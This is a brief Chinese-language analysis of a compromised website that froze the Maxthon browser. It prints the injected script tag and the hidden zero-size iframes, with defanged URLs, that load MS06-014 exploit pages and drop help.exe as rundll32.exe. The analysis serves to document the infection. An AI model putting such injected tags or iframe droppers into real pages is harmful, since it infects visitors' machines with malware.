在 Maxthon 中打开该网站,Maxthon 会假死几分钟。检查网页源文件,发现尾部被加入代码:
/--- <script language=javascript src=hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js></script> ---/
hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js 功能是检测 cookies 变量 starballlll,如果不存在则 创建此变量,然后尝试利用 MS06-014: msadco.dll的漏洞
《Microsoft 安全公告 MS06-014
Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码 (911562)
http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx》
成功则输出代码:
/--- <iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/014.htm></iframe> ---/
不成功则输出代码:
/--- <iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/ying.htm></iframe> <iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/046.htm></iframe> ---/
hxxp://www.st*a**rba*ll.com.cn/wm/014.htm 下载 help.exe,保存为 c:/windows/rundll32.exe
